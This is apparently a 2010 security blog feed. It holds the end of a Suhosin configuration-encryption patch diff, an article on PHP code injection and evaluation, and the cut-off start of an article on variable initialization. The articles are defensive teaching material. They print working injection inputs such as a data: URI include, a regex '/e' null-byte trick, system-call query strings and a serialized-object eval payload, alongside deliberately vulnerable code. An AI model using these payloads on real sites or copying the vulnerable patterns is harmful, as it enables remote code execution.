+   ciphertext_len = strlen(ciphertext);
+   /* undo suhosin_encrypt_string()'s base64 alphabet transformation */
+   for (i=0; i<ciphertext_len; i++) {
+       switch (ciphertext[i]) {
+           case '-': ciphertext[i]='/'; break;
+           case '.': ciphertext[i]='='; break;
+           case '_': ciphertext[i]='+'; break;
+       }
+   }
+   RETURN_STRINGL((char *)ciphertext, ciphertext_len, 1);
+}
+
+/* }}} */
+
+
+/* {{{ proto string secureconfig_decrypt(string ciphertext)
+   Decrypt a configuration value using the configured cryptographic key */
+static PHP_FUNCTION(suhosin_secureconfig_decrypt)
+{
+   char *plaintext, *ciphertext;
+   int plaintext_len, ciphertext_len;
+   int i;
+  
+   if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &ciphertext, &ciphertext_len) == FAILURE) {
+       return;
+   }
+
+   /* redo suhosin_encrypt_string()'s base64 alphabet transformation */
+   for (i=0; i<ciphertext_len; i++) {
+       switch (ciphertext[i]) {
+           case '/': ciphertext[i]='-'; break;
+           case '=': ciphertext[i]='.'; break;
+           case '+': ciphertext[i]='_'; break;
+       }
+   }
+   plaintext = suhosin_decrypt_string(ciphertext, ciphertext_len, "", 0, cryptkey, &plaintext_len, 0 TSRMLS_CC);
+   if(plaintext == NULL || plaintext_len <= 0) {
+       return;
+   }
+   RETURN_STRINGL((char *)plaintext, plaintext_len, 1);
+}
+
+/* }}} */
+
+
+/* {{{ suhosin_secureconfig_functions[]
+ */
+static function_entry suhosin_secureconfig_functions[] = {
+   PHP_NAMED_FE(secureconfig_encrypt, PHP_FN(suhosin_secureconfig_encrypt), NULL)
+   PHP_NAMED_FE(secureconfig_decrypt, PHP_FN(suhosin_secureconfig_decrypt), NULL)
+   {NULL, NULL, NULL}
+};
+/* }}} */
+
+
+void suhosin_hook_secureconfig()
+{
+   char* key;
+   suhosin_SHA256_CTX ctx;
+
+   TSRMLS_FETCH();
+  
+   /* check if we already have secureconfig support */
+   if (zend_hash_exists(CG(function_table), "secureconfig_encrypt", sizeof("secureconfig_encrypt"))) {
+       return;    
+   }
+
+   key = SUHOSIN_G(secureconfig_cryptkey);
+   if (key != NULL) {
+       suhosin_SHA256Init(&ctx);
+       suhosin_SHA256Update(&ctx, (unsigned char*)key, strlen(key));
+       suhosin_SHA256Final((unsigned char *)cryptkey, &ctx);
+   } else {
+       memset(cryptkey, 0x55 /*fallback key with alternating bits*/, 32);
+   }
+
+   /* add the secureconfig functions */
+#ifndef ZEND_ENGINE_2
+   zend_register_functions(suhosin_secureconfig_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
+#else
+   zend_register_functions(NULL, suhosin_secureconfig_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
+#endif
+}
+
+
+/*
+ * Local variables:
+ * tab-width: 4
+ * c-basic-offset: 4
+ * End:
+ * vim600: sw=4 ts=4 fdm=marker
+ * vim<600: sw=4 ts=4
+ */
diff -Naur suhosin-0.9.31.org/suhosin.c suhosin-0.9.31/suhosin.c
--- suhosin-0.9.31.org/suhosin.c    2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/suhosin.c    2010-04-18 15:56:25.000000000 +0200
@@ -956,6 +956,8 @@
    STD_ZEND_INI_BOOLEAN("suhosin.srand.ignore", "1", ZEND_INI_SYSTEM|ZEND_INI_PERDIR, OnUpdateMiscBool, srand_ignore,zend_suhosin_globals, suhosin_globals)
    STD_ZEND_INI_BOOLEAN("suhosin.mt_srand.ignore", "1", ZEND_INI_SYSTEM|ZEND_INI_PERDIR, OnUpdateMiscBool, mt_srand_ignore,zend_suhosin_globals,   suhosin_globals)
 
+   STD_PHP_INI_ENTRY("suhosin.secureconfig.cryptkey", "", PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateString, secureconfig_cryptkey, zend_suhosin_globals, suhosin_globals)
+
 PHP_INI_END()
 /* }}} */
 
@@ -1071,6 +1073,7 @@
    suhosin_hook_crypt();
    suhosin_hook_sha256();
    suhosin_hook_ex_imp();
+   suhosin_hook_secureconfig();
 
    /* register the logo for phpinfo */
    php_register_info_logo(SUHOSIN_LOGO_GUID, "image/jpeg", suhosin_logo, sizeof(suhosin_logo));
diff -Naur suhosin-0.9.31.org/suhosin.ini suhosin-0.9.31/suhosin.ini
--- suhosin-0.9.31.org/suhosin.ini  2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/suhosin.ini  2010-04-18 15:56:25.000000000 +0200
@@ -443,3 +443,10 @@
 ; .htaccess. The string "legcprsum" will allow logging, execution, get,
 ; post, cookie, request, sql, upload, misc features in .htaccess
 ;suhosin.perdir = "0"
+
+; Controls the cryptographic key with which configuration values can be
+; encrypted (and decrypted using (secureconfig_decrypt).
+; It is recommended that this default value should be replaced with a
+; randomly generated key (256 bit key encoded with base64).
+;suhosin.secureconfig.cryptkey = "MDEyMzQ1Njc4OWFiY2RlZjAxMjM0NTY3ODlhYmNkZWY="
+
]]>
http://php-security.org/2010/05/22/mops-submission-08-configuration-encryption-patch-for-suhosin/feed/ 0
MOPS Submission 07: Our Dynamic PHP – Obvious and not so obvious PHP code injection and evaluation http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/ http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/#comments Thu, 20 May 2010 20:01:40 +0000 admin http://php-security.org/?p=300 Today we want to present you the seventh external MOPS submission. It is an article about usual and unusual PHP code execution vulnerabilities sent in by Arthur Gerkis.

Our Dynamic PHP

Obvious and not so obvious PHP code injection and evaluation

Arthur Gerkis, 2010-04-17

1. Abstract

PHP has a low barrier to entry, so it attracts programmers with limited coding skills and, as a rule, poor knowledge of basic security concepts. This often results in poorly written web applications that compromise the servers hosting them. While such applications are widespread, there is today a core of well-known web applications that are possibly more secure. “Possibly”, because of their history of bugs and security holes. Nevertheless, the security of common PHP applications is steadily improving, thanks to the work of security researchers, robust web application frameworks, the maturity of the PHP interpreter and solutions like the “Suhosin” patch.

Vulnerabilities such as SQL injection, cross-site scripting, cross-site request forgery, local/remote file inclusion, directory traversal and others are well known. Avoiding some of them has become instinctive, while others are given new life and power by newly discovered security flaws. But as security bug trackers show, there are still things that developers have forgotten about or never knew. In this article I would like to draw developers’ attention to PHP code execution (evaluation) in places where it is less expected, and to pieces of code that look quite innocent while allowing an attacker to evaluate their own code. For completeness, I will also mention old, well-known security holes.

2. Ways to Evaluate

There are many different ways to cause code evaluation. Several PHP built-in functions change code dynamically by evaluating an expression, and some tricky language constructs and specific PHP features can cause evaluation as well. So eval() is not the only way, and later in this article we will go through all of the possibilities.

If a vulnerability exists and the attacker knows the source code, then only the result needs to be checked, and what counts as a result depends on the attacker’s aim. Sometimes the attacker cannot see the result. This is so-called “blind” code evaluation, which happens when the code is evaluated without visible output. This does not decrease the security risk; in some cases it even turns out to be more harmful. The attacker can use so-called “fuzzing”, a brute-force method, against the target, and no one knows what will happen if one of the brute-force attempts succeeds. In any case, any unintended code evaluation is unacceptable.

I will start with the most frequent and obvious cases of PHP code inclusion and then go deeper, towards things that one might not guess.

2.1. Well-known cases

2.1.1. Evaluating eval()

The first case is the PHP construct that is directly meant for evaluation: eval(). Usually web developers want to evaluate some code with dynamic changes. This approach is often used in template or plugin systems. While it is quite obviously insecure, many applications are still prone to this kind of vulnerability, because it is really tricky to check and filter all the possibilities. As for practical exposure, look at the following lines:

<?php
eval("echo $foobar;");
?>

In this case the variable is interpolated into the string before eval() runs, so the contents of $foobar will be evaluated as PHP code.

<?php
eval('echo $foobar;');
?>

In the second case the value of $foobar will simply be echoed. So, if the second case is what you intended, there is no reason to use double quotes. And do not forget that a variable created during the eval() call remains visible to the surrounding code. In some circumstances this can pose a security risk.
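
The difference between the two quoting styles can be made visible with a harmless value. The following sketch uses an arithmetic expression as a stand-in for attacker-controlled input; the variable names are only illustrative.

```php
<?php
$foobar = '1 + 1';

// Double quotes: PHP interpolates $foobar first, so eval() sees "echo 1 + 1;".
ob_start();
eval("echo $foobar;");
$interpolated = ob_get_clean();

// Single quotes: eval() sees the literal text 'echo $foobar;' and merely
// prints the current value of the variable.
ob_start();
eval('echo $foobar;');
$literal = ob_get_clean();

var_dump($interpolated, $literal);
```

In the first call the expression is computed, so its contents ran as code; in the second call the string is printed unchanged.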

As mentioned, it is hard to escape input perfectly for eval(). There are no functions that properly escape input specifically for eval(); there are simply too many possibilities for what can and should happen along the way. This is a “feature” of dynamic code. If there is no way to avoid eval(), try to use string literals and avoid variable interpolation. When variable interpolation is needed, the variable should be initialized. A custom error handler is also a good way to detect the moment when something has gone wrong.

2.1.2. Code Inclusion

File inclusion vulnerabilities have also been among the most popular and dangerous. A file can be included into the initial PHP script with the following statements:

  • include(), include_once()
  • require(), require_once()

A file that has been included is interpreted as PHP source code.

There are two categories of this attack: local file inclusion, called LFI, and remote file inclusion, as you can guess, RFI (for further explanation see reference Nr. 2). Today web developers have become more careful, but LFI/RFI still sometimes happens. The best protection against this kind of attack is to avoid dynamic paths. If this is not possible, their use should be limited and checked against a list of files that are allowed to be included. Also try to use full paths rather than partial ones: if the PHP include_path directive can be modified, you can never know where a script with a partial path comes from. A good approach is to use file inclusion as follows:

<?php
define('APP_PATH', '/var/www/htdocs/');
require_once(APP_PATH . 'lib.php');
?>
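
When a dynamic path cannot be avoided, the check against a list of allowed files might look like the following sketch. It assumes PHP 7.1 or later; the function resolve_page(), the page names and the base directory are hypothetical.

```php
<?php
// Hypothetical helper: map a request value to a file from a fixed allow-list.
function resolve_page(string $requested, array $allowedPages, string $baseDir): ?string
{
    if (!in_array($requested, $allowedPages, true)) {
        return null; // unknown page: the caller decides how to respond
    }
    // Full path built from a trusted base directory and an allow-listed name.
    return rtrim($baseDir, '/') . '/' . $requested . '.html';
}

$allowed = ['page1', 'page2'];   // assumed page names
$path = resolve_page($_GET['file'] ?? 'page1', $allowed, '/var/www/htdocs');
if ($path !== null) {
    // require_once $path;  // only ever reached with an allow-listed name
}
```

The request value is used only for the lookup, so path tricks and URL wrappers in the input never reach the include statement.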

However, the existence of a local or remote file is not always required. If remote inclusion is possible, the attacker can embed code in the URL itself. This refers to the “data URI” scheme defined in RFC 2397. Suppose we have a vulnerable site that uses file inclusion like this:

http://www.example.com/index.php?file=page1

We can guess that code like the following is used to include files:

<?php
$to_include = $_GET['file'];
require_once($to_include . '.html');
?>

Now imagine that the attacker changes the value of the variable “file” to the following:

http://www.example.com/index.php?file=data:text/plain,<?php phpinfo();?>%00

This simply leads to PHP code execution. Thus LFI can today easily be turned into remote code execution (RCE) in one more way. The data wrapper appeared in PHP 5.2.0 and will not work in older versions. PHP will also refuse to use it if allow_url_include=off. More information about “data URI” can be found in references Nr. 3 and Nr. 4.

Of course, there remain other ways in which PHP code can be injected and later evaluated: via Apache log files, using “/proc” and others. For examples, see references Nr. 5 and Nr. 6, which give a good explanation of different techniques for exploiting this sort of vulnerability. Without doubt, inappropriate use of functions like file_get_contents() and readfile(), of input wrappers like php://input and of similar features is a threat. We will not discuss them because they are less prevalent. Besides, they are subject to the same filtering rules as all other input.

2.2. Regular Expression

Another popular case is code evaluation in regular expressions (“regexp” from here on). Regexps are widely used because it is often easier to write a regexp than to combine several string parsing functions. It saves space and time.
Since PHP supports PCRE (Perl Compatible Regular Expressions), the “e” (PREG_REPLACE_EVAL) modifier is available for one function: preg_replace(). When a match is found, the replacement string is evaluated as PHP code after the backreferences have been substituted. Look at the following code:

<?php
$var = '<tag>phpinfo()</tag>';
preg_replace("/<tag>(.*?)<\/tag>/e", 'addslashes(\\1)', $var);
?>

Most likely, the developer’s intention was to sanitize the input with addslashes(). But the attacker has other plans: here phpinfo() would be executed.

However, even if there is no “e” modifier, attackers sometimes still have a way to evaluate code. It can be achieved by cutting off part of the regexp with a null byte. Let’s look at the same example, slightly modified:

<?php
$regexp = $_GET['re'];
$var = '<tag>phpinfo()</tag>';
preg_replace("/<tag>(.*?)$regexp<\/tag>/", '\\1', $var);
?>

This example may look too naive, but the aim here is to show when a null-byte attack can work. Now suppose that the vulnerable script accepts a request like this:

http://www.example.com/index.php?re=<\/tag>/e%00

This would modify the original regular expression and cause the code to be evaluated. With magic_quotes_gpc=on this would no longer work. However, it was decided to remove this directive in PHP version 6.0 because it has caused a lot of problems for web developers. Proper input filtering is not the job of the PHP interpreter; the web developer alone is responsible for it.

Double quotes should not be used without need; single quotes are safer. If possible, the similar function preg_replace_callback() is the better choice. The only difference is that a callback function is called instead of a replacement string being evaluated. And again, be careful with the callback if it has effects outside of PHP. One filtering method is the function preg_quote(). It escapes regexp special characters and thus prevents input from altering the pattern.
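
Both recommendations can be sketched briefly. The example assumes PHP 7 or later; the input values are made up for illustration, and the closure stands in for whatever processing the application needs.

```php
<?php
$var = "<tag>O'Reilly</tag>";

// The match is handed to the callback as data; it is never compiled as code.
$escaped = preg_replace_callback(
    '/<tag>(.*?)<\/tag>/',
    function (array $m): string {
        return addslashes($m[1]);
    },
    $var
);

// User input that must appear inside a pattern is quoted first, including
// the delimiter, so it can only match literally.
$userInput = '</tag>/e';
$pattern = '/<tag>(.*?)' . preg_quote($userInput, '/') . '/';

var_dump($escaped, preg_match($pattern, '<tag>x</tag>'));
```

After preg_quote() the injected “/e” is just two literal characters to match, not a delimiter followed by a modifier.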

2.3. Dynamic Code

Dynamic code here means everything that can change the normal flow of code execution: dynamic variables (variable variables), creation of new functions on the fly and the complex curly syntax.

2.3.1. Dynamic Variables

PHP allows programmers to use “variable variables” in their code. In this case the name of a variable is set dynamically. Sometimes, to preserve compatibility with old code that cannot be modified, programmers (bad programmers) use an imitation of register_globals=on like this:

<?php
foreach ($_GET as $key => $value) {
   $$key = $value;
}
// ... some code
if (logged_in() || $authenticated) {
   // ... administration area
}
?>

This is convenient not only for beginners or lazy coders, but also for an attacker. Imagine that the attacker sends the following request to the application:

http://www.example.com/index.php?authenticated=true

In combination with an insufficient authentication check as shown in the example (which is practically the rule in applications with vulnerabilities of this level), this would give access to the restricted area.
Although this approach has become part of history, such code still turns up in applications. Values should be initialized and the scope of variables should be watched closely. register_globals has been switched off by default since PHP 4.2.0 and will be removed in PHP 6.0.
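
A safer replacement for the import loop might look like the following sketch, assuming PHP 7 or later. The helper pick_request_values() and the key names are hypothetical; the point is that only expected keys are copied and that security-relevant variables are initialized by the application itself.

```php
<?php
// Hypothetical helper: copy only the expected keys from the request.
function pick_request_values(array $request, array $expectedKeys): array
{
    return array_intersect_key($request, array_flip($expectedKeys));
}

// Always initialized explicitly, never taken from the request.
$authenticated = false;

// Request values stay inside an array instead of becoming variables.
$input = pick_request_values($_GET, ['page', 'lang']);
```

A request parameter named “authenticated” is now simply dropped, because it is not among the expected keys.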

2.3.2. Dynamic Functions

This may be the most popular kind of vulnerability within this category. There are at least two ways to create dynamic functions. The first is as follows:

<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>

Or, if register_globals=on, the previous code is equivalent to the following:

<?php
$dyn_func($argument);
?>

And if we call the script this way:

http://www.example.com/index.php?dyn_func=system&argument=uname

Here the variable $dyn_func becomes the name of the function and $argument is its argument. It should be clear how this could end.
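
If a function name really has to come from outside, it can at least be compared against a fixed list first. A minimal sketch, assuming PHP 7 or later; call_allowed() and the list of permitted functions are hypothetical.

```php
<?php
// Hypothetical helper: call a function only if its name is on the allow-list.
function call_allowed(string $name, string $argument, array $allowedFunctions)
{
    if (!in_array($name, $allowedFunctions, true)) {
        throw new InvalidArgumentException("Function not allowed: $name");
    }
    return $name($argument);
}

// "system" is not in the list and would raise an exception instead of running.
echo call_allowed('strtoupper', 'uname', ['strtoupper', 'strrev']), "\n";
```

The strict comparison matters here: it rules out loose type juggling when the name is compared with the list entries.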

In the second case the code can be exploited even without a function name. create_function() creates an anonymous function whose body is the second argument. Example of vulnerable code:

<?php
$foobar = $_GET['foobar'];
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>

The following request would then output the result of executing the system command “ls”:

http://www.example.com/index.php?foobar=system('ls')

Expressed with eval(), it would look something like this:

<?php
eval("function lambda_n() { echo system('ls'); }");
lambda_n();
?>

The reason is that create_function() is simply an internal PHP wrapper around eval.

2.3.3. Curly syntax

The complex curly syntax was meant to separate code from strings, or rather to embed it in them. As the PHP manual says, “complex” means that it allows the use of complex expressions. Developers usually use this functionality as follows:

<?php
$year = "10";
$foobar = "That was 20{$year}-th year.";
?>

This way it is possible to merge text in strings with variable values. And now imagine this case:

<?php
$var = "I was innocent until ${`ls`} appeared here";
?>

Here the system command “ls” will be executed. But why does this happen? The code between the curly braces is evaluated and its result replaces {`ls`}, which produces a variable name. That is why PHP complains about an undefined variable whose name consists of the directory listing when this code runs. It is the same as if it were:

<?php
eval("$foo");
?>

Here “foo” is the result of the command “ls” (as a string). Something crazy like this will also work:

<?php
$foobar = 'phpinfo';
${'foobar'}();
?>

While this does not pose any security risk when used alone, curly syntax can help to evade filters in preg_replace() and other places where code is mixed with strings. Most exploits that use a regexp vulnerability rely on this trick.

2.4. Rare but possible cases

The following pitfalls are probably less widespread among web developers because these functions are used differently: they often do not need to interact with user input as actively as in the previous examples. But because there are so many of these functions, they are worth mentioning.

ob_start() accepts a callback function as an argument, which is executed when the output buffer is flushed. The content that was printed is passed to the callback function as an argument. Output buffering is usually used to compress data that is sent back to the browser. Let’s consider the following malicious usage:

<?php
$foobar = 'system';
ob_start($foobar);
echo 'uname';
ob_end_flush();
?>

If $foobar is controllable by the attacker, this would execute the system command “uname”.

The function assert() is as easy to exploit as eval(), but it is a less common security hole. It accepts a string argument that will be evaluated. The following code has the same effect as the previous example:

<?php
$foobar = 'system("uname")';
assert($foobar);
?>

This function should be used in development code as a debugging aid. Still, developers often misuse assert().

Developers can use array functions to apply a list of operations to data or vice versa. In most cases the functions applied are predefined, so this vulnerability is also not very common in the wild. It is still worth mentioning because of its potential:

  • array_map()
  • usort(), uasort(), uksort()
  • array_filter()
  • array_reduce()
  • array_diff_uassoc(), array_diff_ukey()
  • array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
  • array_intersect_uassoc(), array_intersect_ukey()
  • array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
  • array_walk(), array_walk_recursive()

As an example, let’s take one function from this list and exploit it:

<?php
$evil_callback = $_GET['callback'];
$some_array = array(0, 1, 2, 3);
$new_array = array_map($evil_callback, $some_array);
?>

Now the attacker requests the following URL:

http://www.example.com/index.php?callback=phpinfo

As a result, the callback chosen by the attacker is applied to every element of the array, and phpinfo() gets executed.
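
One way to keep the choice of callback out of the attacker’s hands is a lookup table: the request selects a key, and the application owns the functions behind the keys. The following is a sketch assuming PHP 7 or later; the table entries and the helper apply_transform() are hypothetical.

```php
<?php
// The request may only choose between these keys; it never names a function.
$transforms = [
    'double' => function (int $n): int { return $n * 2; },
    'square' => function (int $n): int { return $n * $n; },
];

// Hypothetical helper: apply the selected transform, or none if unknown.
function apply_transform(string $choice, array $values, array $transforms): array
{
    if (!array_key_exists($choice, $transforms)) {
        return $values; // unknown choice: leave the data untouched
    }
    return array_map($transforms[$choice], $values);
}

$new_array = apply_transform($_GET['callback'] ?? 'double', [0, 1, 2, 3], $transforms);
```

With this design a value such as “phpinfo” is just an unknown key and is never passed to array_map().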

Continuing with functions that use callbacks, we can mention the XML Parser functions. These functions are enabled in PHP by default:

  • xml_set_character_data_handler()
  • xml_set_default_handler()
  • xml_set_element_handler()
  • xml_set_end_namespace_decl_handler()
  • xml_set_external_entity_ref_handler()
  • xml_set_notation_decl_handler()
  • xml_set_processing_instruction_handler()
  • xml_set_start_namespace_decl_handler()
  • xml_set_unparsed_entity_decl_handler()

Some other frequently used functions that have not been mentioned yet also use callbacks:

  • stream_filter_register()
  • set_error_handler()
  • register_shutdown_function()
  • register_tick_function()

The functions mentioned here are those that might appear in applications, but there remains a huge number of undocumented or deprecated functions and extensions that use callback functions or otherwise allow dynamic code to be generated. It is nearly impossible to remember them all. Moreover, they can appear and disappear between PHP releases. So the easier and safer way is to sanitize input properly and to think about what can influence the value passed as a callback argument.

2.5. Miscellaneous and not the last

We have discussed many ways in which evil code can be injected into native code. But the game is not over. One should also not forget some complicated cases that arise from bugs in the PHP interpreter itself and from particular combinations of circumstances. Until such a bug is discovered and publicly disclosed, everyone is vulnerable.

One striking example is the relatively recently discovered insecure behavior of the unserialize() function in combination with class destructors. In short, if we unserialize an object of some class, the __destruct() method of this class will be called when the object is destroyed. If an attacker can send a specially crafted serialized string, they are able to execute arbitrary code. An oversimplified example:

<?php
class Example {
   var $var = '';
   function __destruct() {
      eval($this->var);
   }
}
unserialize($_GET['saved_code']);
?>

And the following link would execute desired code, in our case, phpinfo():

http://www.example.com/index.php?saved_code=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}

Of course, certain circumstances are needed for such a string to reach object methods, and it is not easy to find an exploitable place, but there are exploits in the wild based on this behavior, so it should be taken into account. For a better and original explanation of this vulnerability, see reference #7.
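As a hedged illustration of one possible mitigation (not something available when this article was written): since PHP 7.0, unserialize() accepts an options array, and 'allowed_classes' => false prevents the named class from being instantiated, so its destructor is never run. The static counter below is an assumption added only to make the effect observable, and the destructor deliberately does not eval() anything.

```php
<?php
class Example {
    public $var = '';
    public static $destructed = 0; // demo-only counter (assumption)
    function __destruct() {
        self::$destructed++;       // stands in for the dangerous eval()
    }
}

$payload = 'O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}';

// Requires PHP 7.0+: objects are returned as __PHP_Incomplete_Class instead.
$value = unserialize($payload, array('allowed_classes' => false));

var_dump($value instanceof Example); // bool(false)
unset($value);
var_dump(Example::$destructed);      // int(0)
```

Where the data format is under your control, avoiding unserialize() on user input altogether (for example by using JSON) sidesteps the problem entirely.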

3. To sum up

As you can see, this problem is still very relevant. If you decide to allow users to embed some code, then treat such embedded code as if it were always executing dangerous functions: simply never trust the user, or even the administrator. It is very hard to escape user input correctly because there is always a possibility that something has been forgotten. That is why using blacklists is generally a bad idea. It is much easier and safer to define a whitelist of allowed functions, tags, or whatever you wish to allow as input. However, even this is not a guarantee of security. The more static the code, the safer it is.

If you want to write portable and secure code, never rely on the PHP configuration: it can change every time your application leaves the development platform. For example, if your PHP is configured with safe_mode=on, magic_quotes_gpc=on, register_globals=off and so on, it does not mean that the application will always remain bulletproof and stable. While in PHP 5.0 the Zend Engine developers' efforts were concentrated on OOP, in PHP 6.0 the focus is on security, better Unicode support and less configuration-dependent behavior. This article mentioned some features that will be removed in the new PHP, so be ready for broken applications if you do not take those changes into account.

As you may have noticed, everything that is convenient for the developer turns out to be a security risk. That is the price paid for the features that are supposed to make life easier. The more static code you use, the fewer opportunities there are to get exploited. We gain one thing, faster development, but lose another, control over the application. Beware of it.

4. References

#1 http://www.hardened-php.net/suhosin/ Suhosin, advanced protection system for PHP
#2 http://projects.webappsec.org/Remote-File-Inclusion explanation of RFI
#3 http://tools.ietf.org/html/rfc2397 The “data” URL scheme
#4 http://www.php.net/manual/en/wrappers.data.php Data (RFC 2397), PHP manual
#5 http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/ how LFI can lead to RCE
#6 http://www.exploit-db.com/papers/260 how LFI can lead to RCE (2)
#7 http://www.sektioneins.com/en/advisories/index.html unserialize() based advisories and many others
]]>
http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/feed/ 0
MOPS Submission 06: Variable Initialization in PHP http://php-security.org/2010/05/17/mops-submission-06-variable-initialization-in-php/ http://php-security.org/2010/05/17/mops-submission-06-variable-initialization-in-php/#comments Mon, 17 May 2010 13:13:15 +0000 admin http://php-security.org/?p=273 Today we want to present you the sixth external MOPS submission. It is the second article sent in by Jakub Vrana. This one is about variable initialization in PHP.

Variable initialization in PHP

Jakub Vrana <vrana [at] php.net>, 2010-03-31

Introduction

Consider the following code:

<?php
if (authUser($_POST["login"], $_POST["password"])) {
    $auth = true;
}
if ($auth) {
    echo "Secret\n";
}
?>

You can easily spot the vulnerability in it. The $auth variable is not initialized in all cases, so it can be spoofed from outside. PHP defines a way to handle uninitialized variables (unlike C, for example): they all have the null value. The problem is that the variable can be initialized from other sources:

  • Previous code
  • Included file
  • From outside if register_globals is enabled
  • By using extract() on an untrusted variable
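The last source in the list can be demonstrated without register_globals. The following is a minimal sketch: authUser() here is a hypothetical stub that always rejects, and isAuthenticated() is an illustrative wrapper whose $request parameter stands in for untrusted input such as $_GET.

```php
<?php
// Hypothetical stand-in for the article's authUser(); it always rejects.
function authUser($login, $password) {
    return false;
}

// Mimics the vulnerable flow: $auth is only assigned on success.
function isAuthenticated(array $request) {
    extract($request); // creates local variables from attacker-controlled keys
    if (authUser('guest', 'wrong')) {
        $auth = true;
    }
    return !empty($auth);
}

var_dump(isAuthenticated(array()));            // bool(false)
var_dump(isAuthenticated(array('auth' => 1))); // bool(true): $auth was spoofed
```

Authentication fails in both calls, yet the second one is treated as authenticated because the key "auth" became the variable $auth.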

Defense

The defense against this vulnerability is simple – always initialize all variables:

<?php
$auth = false;
if (authUser($_POST["login"], $_POST["password"])) {
    $auth = true;
}
?>

Now, whatever $auth contained before (if anything), it is always reset to false. It is a good idea to initialize variables unconditionally. The following code would work, but it is not as robust:

<?php
if (authUser($_POST["login"], $_POST["password"])) {
    $auth = true;
} else {
    $auth = false;
}
?>

Now suppose that someone also wants to check the IP address and does it this way:

<?php
if ($_SERVER["REMOTE_ADDR"] == "127.0.0.1") {
    if (authUser($_POST["login"], $_POST["password"])) {
        $auth = true;
    }
} else {
    $auth = false;
}
?>

The $auth variable can be spoofed again: when the request comes from 127.0.0.1 and authUser() fails, no branch assigns $auth at all.
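With unconditional initialization the same change stays safe, however the branches are later rearranged. A small sketch follows; isAuthorized() and its parameters are hypothetical, with $credentialsOk standing in for the result of authUser().

```php
<?php
// Hypothetical wrapper: $credentialsOk stands in for the result of authUser().
function isAuthorized($remoteAddr, $credentialsOk) {
    $auth = false; // unconditional initialization, independent of any branch
    if ($remoteAddr == "127.0.0.1") {
        if ($credentialsOk) {
            $auth = true;
        }
    }
    return $auth;
}

var_dump(isAuthorized("127.0.0.1", false)); // bool(false)
var_dump(isAuthorized("127.0.0.1", true));  // bool(true)
var_dump(isAuthorized("10.0.0.1", true));   // bool(false)
```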

Note: The attacker must know the variable name to spoof – he can guess it, get it from some error message, brute-force it, but most commonly he gets it from the source code (open-source applications or a former employee).

Disabling register_globals

It is important to mention that disabling register_globals is not a defense against this attack. It only closes the most common attack vector. It is of course a good idea to disable it, but good applications that initialize all variables work independently of the register_globals value. Thus, it is not necessary to emulate disabling register_globals with some variation of the following code:

<?php
// never use this kind of code
if (ini_get("register_globals")) {
    foreach ($_REQUEST as $key => $val) {
        unset($$key);
    }
}
?>

Spotting of uninitialized variables

PHP has a mechanism to spot uninitialized variables: it issues an E_NOTICE-level error for most uses of uninitialized variables. There are, however, some problems with it:

  1. It does not warn about assigning to an uninitialized array.
  2. It warns about accessing a non-existing index in a properly initialized array.
  3. It is issued at runtime.

E_NOTICE does not warn about assigning to an uninitialized array

The first problem is the most serious. Consider the following code:

<?php
$config["password"] = "pwd";
if (isset($_POST["password"]) && $_POST["password"] == $config["password"]) {
    echo "Secret information.\n";
}
?>

It issues no notices if an attacker spoofs the $config variable. If he passes a string then the code is interpreted like this:

<?php
$config[0] = "p";
// $config is a string so [] is used to access bytes in the string
// "password" is converted to number 0 because string positions are always integers
// only one byte can be written to [0] so "pwd" is interpreted as "p"
if (isset($_POST["password"]) && $_POST["password"] == $config[0]) {
    echo "Secret information.\n";
}
?>

Now it is enough to guess the first character of the password and send it along with the spoofed $config.
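The remedy is the same as for scalar variables: initialize the array unconditionally before the first element is assigned. In the sketch below the first assignment merely simulates a spoofed value (an assumption for the demo); in a real attack it would arrive from outside.

```php
<?php
// Simulate a spoofed global: $config already exists and is a string.
$config = "x";

// Unconditional initialization discards whatever was there before.
$config = array();
$config["password"] = "pwd";

var_dump($config["password"] === "pwd"); // bool(true)
```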

E_NOTICE warns about accessing non-existing index in properly initialized array

The second problem is not security-related but concerns code brevity. The following code issues a notice even though it works well and cannot be fooled:

<input name="search" value="<?php echo htmlspecialchars((string) $_GET["search"]); ?>" />

With notices enabled, we must rewrite it to a longer code with the same functionality:

<input name="search" value="<?php
if (isset($_GET["search"])) {
    echo htmlspecialchars((string) $_GET["search"]);
}
?>" />
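One common way to keep such code short while staying notice-free is a small accessor function. This is only a sketch of that design choice, not something the article prescribes; the name param() and its signature are hypothetical.

```php
<?php
// Hypothetical accessor: returns a request value as a string, or a default.
function param(array $source, $name, $default = '') {
    return (isset($source[$name]) && is_string($source[$name]))
        ? $source[$name]
        : $default;
}

// In a template this would be called as param($_GET, "search").
echo htmlspecialchars(param(array('search' => '<b>'), 'search')), "\n"; // &lt;b&gt;
echo htmlspecialchars(param(array(), 'search')), "\n";                  // empty line
```

The isset() check is written once, and non-string values (such as arrays sent as search[]=x) fall back to the default.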

Another example of this thoroughness: the following code is perfectly valid and does what we expect from it (it counts group members):

<?php
$groups = array();
foreach (getData() as $data) {
    $groups[$data["id_group"]]++;
}
?>

With notices enabled, it must be rewritten like this:

<?php
$groups = array();
foreach (getData() as $data) {
    if (!isset($groups[$data["id_group"]])) {
        $groups[$data["id_group"]] = 0;
    } else {
        $groups[$data["id_group"]]++;
    }
}
?>

I would not say that this code is clearer or less error-prone (it already contains one error).
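The error in the longer version is that the first occurrence of a group sets the counter to 0 and skips the increment, so every count ends up one too low. A notice-free sketch that counts correctly could look like this; countGroups() is a hypothetical wrapper that takes the rows as a parameter instead of calling getData().

```php
<?php
// Hypothetical wrapper: $rows plays the role of getData()'s result.
function countGroups(array $rows) {
    $groups = array();
    foreach ($rows as $data) {
        $id = $data["id_group"];
        if (!isset($groups[$id])) {
            $groups[$id] = 0; // initialize first ...
        }
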